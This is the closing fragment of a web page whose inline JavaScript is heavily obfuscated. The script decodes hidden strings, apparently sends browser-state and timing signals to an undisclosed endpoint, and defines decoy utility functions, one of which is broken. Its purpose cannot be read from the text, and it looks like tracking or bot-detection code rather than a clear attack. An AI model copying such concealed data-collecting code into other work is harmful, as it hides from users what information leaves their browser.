Umd97Q=j2tRUWQ.indexOf(eS9fQMb[FUaXU5]);if(Umd97Q===-FZHYVb[0x1])continue;if(nco7OV<FZHYVb[0x0]){nco7OV=Umd97Q}else{N4W9hYK(nco7OV+=Umd97Q*FZHYVb[0xc],R_2lkdW|=nco7OV<<Q4sOnFn,Q4sOnFn+=(nco7OV&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(_PoKZj.push(R_2lkdW&FZHYVb[0x3]),R_2lkdW>>=FZHYVb[0x2],Q4sOnFn-=FZHYVb[0x2])}while(Q4sOnFn>FZHYVb[0x9]);nco7OV=-FZHYVb[0x1]}}if(nco7OV>-FZHYVb[0x1]){_PoKZj.push((R_2lkdW|nco7OV<<Q4sOnFn)&FZHYVb[0x3])}return t24J32(_PoKZj)}function j2tRUWQ(j2tRUWQ){if(typeof rxdmS4[j2tRUWQ]===FZHYVb[0x5]){return rxdmS4[j2tRUWQ]=g3Gld7J(FlCAu25[j2tRUWQ])}return rxdmS4[j2tRUWQ]}return io4LB2P(R_2lkdW(0x8c),{[R_2lkdW(0x8d)]:FUaXU5,[j2tRUWQ(0x8e)]:Umd97Q,[j2tRUWQ(0x8f)]:z12fX0-ypO47D,mm:lwkZPmj,dc:HwsNDHD,fk:_PoKZj,[j2tRUWQ(0x90)]:!document[j2tRUWQ(0x91)]&&document[j2tRUWQ(0x92)](),ms:RpmYYq-z12fX0})[j2tRUWQ(0x93)](g3Gld7J=>{return g3Gld7J&&setTimeout(()=>{return WuMNj_9(g3Gld7J)},MSUxhJ2?MSUxhJ2-(cUL0VT()-RpmYYq):FZHYVb[0x0])})[j2tRUWQ(0x94)](()=>{return FZHYVb[0x0]})},FZHYVb[0x20]))})},ch:()=>{function g3Gld7J(g3Gld7J){var _PoKZj="<VEArB@_XFT\"s?]ok[u(>n}*vH,wC`8{xyZLd6J|.+Pj1U5m:tQcR0IM)a$bp723D^4;if9gW=N&GSK~hOY%ze!#/ql",MSUxhJ2,j2tRUWQ,Q4sOnFn,nco7OV,R_2lkdW,FUaXU5,eS9fQMb;N4W9hYK(MSUxhJ2=""+(g3Gld7J||""),j2tRUWQ=MSUxhJ2.length,Q4sOnFn=[],nco7OV=FZHYVb[0x0],R_2lkdW=FZHYVb[0x0],FUaXU5=-FZHYVb[0x1]);for(eS9fQMb=FZHYVb[0x0];eS9fQMb<j2tRUWQ;eS9fQMb++){var Umd97Q=_PoKZj.indexOf(MSUxhJ2[eS9fQMb]);if(Umd97Q===-FZHYVb[0x1])continue;if(FUaXU5<FZHYVb[0x0]){FUaXU5=Umd97Q}else{N4W9hYK(FUaXU5+=Umd97Q*FZHYVb[0xc],nco7OV|=FUaXU5<<R_2lkdW,R_2lkdW+=(FUaXU5&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(Q4sOnFn.push(nco7OV&FZHYVb[0x3]),nco7OV>>=FZHYVb[0x2],R_2lkdW-=FZHYVb[0x2])}while(R_2lkdW>FZHYVb[0x9]);FUaXU5=-FZHYVb[0x1]}}if(FUaXU5>-FZHYVb[0x1]){Q4sOnFn.push((nco7OV|FUaXU5<<R_2lkdW)&FZHYVb[0x3])}return t24J32(Q4sOnFn)}function _PoKZj(_PoKZj){if(typeof rxdmS4[_PoKZj]===FZHYVb[0x5]){return rxdmS4[_PoKZj]=g3Gld7J(FlCAu25[_PoKZj])}return rxdmS4[_PoKZj]}return io4LB2P(_PoKZj(0x95),{[_PoKZj(0x96)]:FUaXU5,[_PoKZj(0x97)]:Umd97Q})[_PoKZj(0x98)](g3Gld7J=>{return Number(g3Gld7J)===FZHYVb[0x1]})},bl:()=>{function g3Gld7J(g3Gld7J){var _PoKZj="e9dkCH|]UEmqL6x+=g_,nNPQbIKG<iB/pD@0VWoMh^>cS)Tr&[A4ZROYFsw3J7f\"Xj:.#l5ayv(!}$`u{%1;*2?~8zt",MSUxhJ2,j2tRUWQ,Q4sOnFn,nco7OV,R_2lkdW,FUaXU5,eS9fQMb;N4W9hYK(MSUxhJ2=""+(g3Gld7J||""),j2tRUWQ=MSUxhJ2.length,Q4sOnFn=[],nco7OV=FZHYVb[0x0],R_2lkdW=FZHYVb[0x0],FUaXU5=-FZHYVb[0x1]);for(eS9fQMb=FZHYVb[0x0];eS9fQMb<j2tRUWQ;eS9fQMb++){var Umd97Q=_PoKZj.indexOf(MSUxhJ2[eS9fQMb]);if(Umd97Q===-FZHYVb[0x1])continue;if(FUaXU5<FZHYVb[0x0]){FUaXU5=Umd97Q}else{N4W9hYK(FUaXU5+=Umd97Q*FZHYVb[0xc],nco7OV|=FUaXU5<<R_2lkdW,R_2lkdW+=(FUaXU5&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(Q4sOnFn.push(nco7OV&FZHYVb[0x3]),nco7OV>>=FZHYVb[0x2],R_2lkdW-=FZHYVb[0x2])}while(R_2lkdW>FZHYVb[0x9]);FUaXU5=-FZHYVb[0x1]}}if(FUaXU5>-FZHYVb[0x1]){Q4sOnFn.push((nco7OV|FUaXU5<<R_2lkdW)&FZHYVb[0x3])}return t24J32(Q4sOnFn)}function _PoKZj(_PoKZj){if(typeof rxdmS4[_PoKZj]===FZHYVb[0x5]){return rxdmS4[_PoKZj]=g3Gld7J(FlCAu25[_PoKZj])}return rxdmS4[_PoKZj]}if(_PoKZj(0x99)in xEv0OAf){MSUxhJ2()}function MSUxhJ2(){function g3Gld7J(g3Gld7J){var _PoKZj="`AKIOT7pBc0Jl#_d3s~,%4i5Hb1uQZSw)M8]@za2FV?$vLgWXmof<h+}jUCr:[&PyG!.t9{6*/D>Nex^(=Ekn\"|;RqY",MSUxhJ2,j2tRUWQ,Q4sOnFn,nco7OV,R_2lkdW,FUaXU5,eS9fQMb;N4W9hYK(MSUxhJ2=""+(g3Gld7J||""),j2tRUWQ=MSUxhJ2.length,Q4sOnFn=[],nco7OV=FZHYVb[0x0],R_2lkdW=FZHYVb[0x0],FUaXU5=-FZHYVb[0x1]);for(eS9fQMb=FZHYVb[0x0];eS9fQMb<j2tRUWQ;eS9fQMb++){var Umd97Q=_PoKZj.indexOf(MSUxhJ2[eS9fQMb]);if(Umd97Q===-FZHYVb[0x1])continue;if(FUaXU5<FZHYVb[0x0]){FUaXU5=Umd97Q}else{N4W9hYK(FUaXU5+=Umd97Q*FZHYVb[0xc],nco7OV|=FUaXU5<<R_2lkdW,R_2lkdW+=(FUaXU5&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(Q4sOnFn.push(nco7OV&FZHYVb[0x3]),nco7OV>>=FZHYVb[0x2],R_2lkdW-=FZHYVb[0x2])}while(R_2lkdW>FZHYVb[0x9]);FUaXU5=-FZHYVb[0x1]}}if(FUaXU5>-FZHYVb[0x1]){Q4sOnFn.push((nco7OV|FUaXU5<<R_2lkdW)&FZHYVb[0x3])}return t24J32(Q4sOnFn)}function _PoKZj(_PoKZj){if(typeof rxdmS4[_PoKZj]===FZHYVb[0x5]){return rxdmS4[_PoKZj]=g3Gld7J(FlCAu25[_PoKZj])}return rxdmS4[_PoKZj]}function MSUxhJ2(g3Gld7J){const _PoKZj={};for(let MSUxhJ2 of g3Gld7J.replace(/[^w]/g,"").toLowerCase())_PoKZj[MSUxhJ2]=_PoKZj[MSUxhJ2]+FZHYVb[0x1]||FZHYVb[0x1];return _PoKZj}function j2tRUWQ(g3Gld7J,_PoKZj){const MSUxhJ2=buildCharMap(g3Gld7J),j2tRUWQ=buildCharMap(_PoKZj);for(let Q4sOnFn in MSUxhJ2)if(MSUxhJ2[Q4sOnFn]!==j2tRUWQ[Q4sOnFn]){return FZHYVb[0x26]}if(Object.keys(MSUxhJ2).length!==Object.keys(j2tRUWQ).length){return FZHYVb[0x26]}return!0x0}function Q4sOnFn(g3Gld7J){const _PoKZj=nco7OV(g3Gld7J);return _PoKZj!==0x1/0x0}function nco7OV(g3Gld7J){if(!g3Gld7J){return-FZHYVb[0x1]}const _PoKZj=nco7OV(g3Gld7J.left),MSUxhJ2=nco7OV(g3Gld7J.right),j2tRUWQ=Math.abs(_PoKZj-MSUxhJ2);if(_PoKZj===0x1/0x0||MSUxhJ2===0x1/0x0||j2tRUWQ>FZHYVb[0x1]){return 0x1/0x0}const Q4sOnFn=Math.max(_PoKZj,MSUxhJ2)+FZHYVb[0x1];return Q4sOnFn}window[_PoKZj(0x9a)]={buildCharacterMap:MSUxhJ2,isAnagrams:j2tRUWQ,isBalanced:Q4sOnFn,getHeightBalanced:nco7OV}}return io4LB2P(_PoKZj(0x9b),{[_PoKZj(0x9c)]:FUaXU5,[_PoKZj(0x9d)]:Umd97Q})[_PoKZj(0x9e)](()=>{})}})}g3Gld7J()})();
</script>

</body>
</html>
